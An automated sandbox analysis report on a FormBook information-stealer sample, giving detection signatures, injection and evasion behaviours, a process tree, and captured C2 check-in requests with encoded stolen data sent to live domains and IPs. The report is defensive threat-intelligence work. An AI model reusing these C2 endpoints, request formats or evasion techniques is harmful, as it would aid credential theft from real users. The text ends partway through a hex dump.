Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wWXR5js3k2.exe

Overview

General Information

Sample name:wWXR5js3k2.exe
renamed because original name is a hash value
Original sample name:919e47baabe9cc5fe28aa098991efc624b4cfe2c4008ce036a35b49edc438a4d.exe
Analysis ID:1587987
MD5:9d8150f9b27a2a93925717d361add951
SHA1:92f4860eda8a22e43fc777b64c590891280d6a80
SHA256:919e47baabe9cc5fe28aa098991efc624b4cfe2c4008ce036a35b49edc438a4d
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wWXR5js3k2.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\wWXR5js3k2.exe" MD5: 9D8150F9B27A2A93925717D361ADD951)
    • svchost.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\wWXR5js3k2.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ycBMGRFRlht.exe (PID: 3688 cmdline: "C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • powercfg.exe (PID: 7604 cmdline: "C:\Windows\SysWOW64\powercfg.exe" MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • ycBMGRFRlht.exe (PID: 6568 cmdline: "C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7840 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.2600000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.2600000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\wWXR5js3k2.exe", CommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", ParentImage: C:\Users\user\Desktop\wWXR5js3k2.exe, ParentProcessId: 7260, ParentProcessName: wWXR5js3k2.exe, ProcessCommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", ProcessId: 7316, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\wWXR5js3k2.exe", CommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", ParentImage: C:\Users\user\Desktop\wWXR5js3k2.exe, ParentProcessId: 7260, ParentProcessName: wWXR5js3k2.exe, ProcessCommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", ProcessId: 7316, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T20:11:07.355810+010028554641A Network Trojan was detected192.168.2.96451543.205.198.2980TCP
                2025-01-10T20:11:09.893739+010028554641A Network Trojan was detected192.168.2.96451643.205.198.2980TCP
                2025-01-10T20:11:12.451878+010028554641A Network Trojan was detected192.168.2.96451743.205.198.2980TCP
                2025-01-10T20:11:20.710172+010028554641A Network Trojan was detected192.168.2.964519188.114.97.380TCP
                2025-01-10T20:11:23.244704+010028554641A Network Trojan was detected192.168.2.964520188.114.97.380TCP
                2025-01-10T20:11:25.845738+010028554641A Network Trojan was detected192.168.2.964521188.114.97.380TCP
                2025-01-10T20:11:34.312650+010028554641A Network Trojan was detected192.168.2.964523194.245.148.18980TCP
                2025-01-10T20:11:37.285209+010028554641A Network Trojan was detected192.168.2.964524194.245.148.18980TCP
                2025-01-10T20:11:39.490086+010028554641A Network Trojan was detected192.168.2.964525194.245.148.18980TCP
                2025-01-10T20:11:47.779010+010028554641A Network Trojan was detected192.168.2.96452763.250.43.13480TCP
                2025-01-10T20:11:51.267833+010028554641A Network Trojan was detected192.168.2.96452863.250.43.13480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: wWXR5js3k2.exeVirustotal: Detection: 64%Perma Link
                Source: wWXR5js3k2.exeReversingLabs: Detection: 73%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2610818121.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2615837301.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1886979901.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: wWXR5js3k2.exeJoe Sandbox ML: detected
                Source: wWXR5js3k2.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: powercfg.pdbGCTL source: svchost.exe, 00000002.00000003.1852599121.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1852713638.0000000002A2D000.00000004.00000020.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2612973441.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ycBMGRFRlht.exe, 00000004.00000000.1809965971.000000000041E000.00000002.00000001.01000000.00000005.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1957819340.000000000041E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: wWXR5js3k2.exe, 00000000.00000003.1371523327.00000000036F0000.00000004.00001000.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1370169862.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793017531.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795048850.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1888818959.0000000003100000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.000000000344E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1886495587.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: wWXR5js3k2.exe, 00000000.00000003.1371523327.00000000036F0000.00000004.00001000.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1370169862.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1793017531.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795048850.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, powercfg.exe, 00000005.00000003.1888818959.0000000003100000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.000000000344E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1886495587.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: powercfg.exe, 00000005.00000002.2611913316.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.00000000038DC000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1958596191.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185627863.000000003B45C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: powercfg.exe, 00000005.00000002.2611913316.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.00000000038DC000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1958596191.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185627863.000000003B45C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: powercfg.pdb source: svchost.exe, 00000002.00000003.1852599121.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1852713638.0000000002A2D000.00000004.00000020.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2612973441.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_006B445A
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BC6D1 FindFirstFileW,FindClose,0_2_006BC6D1
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_006BC75C
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006BEF95
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006BF0F2
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006BF3F3
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006B37EF
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006B3B12
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006BBCBC
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A7C9B0 FindFirstFileW,FindNextFileW,FindClose,5_2_02A7C9B0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 4x nop then xor eax, eax5_2_02A69F20
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 4x nop then pop edi5_2_02A6E620
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 4x nop then pop edi5_2_02A6E5FC
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 4x nop then mov ebx, 00000004h5_2_031004DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64525 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64524 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64523 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64528 -> 63.250.43.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64515 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64527 -> 63.250.43.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64516 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64520 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64519 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64517 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64521 -> 188.114.97.3:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.oneeyetrousersnake.xyz
                Source: global trafficTCP traffic: 192.168.2.9:64437 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 43.205.198.29 43.205.198.29
                Source: Joe Sandbox ViewASN Name: CSLDE CSLDE
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006C22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_006C22EE
                Source: global trafficHTTP traffic detected: GET /mz0w/?rdmhfXe=uMzU0JGK22aEYJLCyAIreKcU1rJUCkGv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wwp4pfrJHMjCh6luBqHWNFeR0cmEvsKw==&AF=At8pGDY0Z HTTP/1.1Host: www.qqa79.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6pwo/?rdmhfXe=OcYLCa3XOMtt+Rsv8j1JEBYyKSs2FBnaDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abiRcuJlWrvFsYiciiVw8Ks4AYAtrm9w==&AF=At8pGDY0Z HTTP/1.1Host: www.1secondlending.oneAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rk61/?rdmhfXe=4Jev6jkxg6xEO7DVmJ20iETfs2t7f6dacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9IEZesAjm/l1NEB+do2leeTcUFeI7Uw==&AF=At8pGDY0Z HTTP/1.1Host: www.supernutra01.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hakt/?rdmhfXe=Z3UZ9pkvUTN8eySircCOaDAcK9AA6JZfB0YdpGFssPaitvOOGMcOB1EIrUeEo9sxw4W4nK9e2r79OuzvY2TkP9tUb4eHWat+jQL942ZrdRgvNUE9NQ==&AF=At8pGDY0Z HTTP/1.1Host: www.wine-drinkers.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: www.qqa79.top
                Source: global trafficDNS traffic detected: DNS query: www.1secondlending.one
                Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                Source: global trafficDNS traffic detected: DNS query: www.wine-drinkers.club
                Source: global trafficDNS traffic detected: DNS query: www.oneeyetrousersnake.xyz
                Source: unknownHTTP traffic detected: POST /6pwo/ HTTP/1.1Host: www.1secondlending.oneAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brContent-Length: 196Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.1secondlending.oneReferer: http://www.1secondlending.one/6pwo/User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36Data Raw: 72 64 6d 68 66 58 65 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 71 53 30 68 38 78 6f 2f 46 68 77 57 47 42 70 4b 5a 57 54 4e 50 78 35 6e 73 32 31 56 41 55 6b 6f 62 58 71 71 64 5a 45 48 53 51 4e 7a 6c 79 46 4d 68 37 69 6b 39 2f 4f 64 72 48 41 61 4d 6b 41 70 41 52 62 65 75 55 6e 4f 6a 32 6f 30 62 45 72 51 73 41 4d 41 75 39 32 55 4a 41 6b 6d 76 37 63 4a 50 38 4c 6a 75 6a 79 62 56 76 61 63 51 75 6c 79 67 38 63 30 36 70 59 6f 41 75 33 37 65 6e 6a 69 67 6f 50 45 5a 38 63 68 6c 49 65 57 43 4d 6b 65 55 53 58 79 74 58 62 6a 43 72 4c 38 6c 56 70 73 6e 47 52 36 52 67 69 30 6e 48 30 46 78 35 78 51 Data Ascii: rdmhfXe=DewrBs2mT9lmqS0h8xo/FhwWGBpKZWTNPx5ns21VAUkobXqqdZEHSQNzlyFMh7ik9/OdrHAaMkApARbeuUnOj2o0bErQsAMAu92UJAkmv7cJP8LjujybVvacQulyg8c06pYoAu37enjigoPEZ8chlIeWCMkeUSXytXbjCrL8lVpsnGR6Rgi0nH0Fx5xQ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:10:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:11:07 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 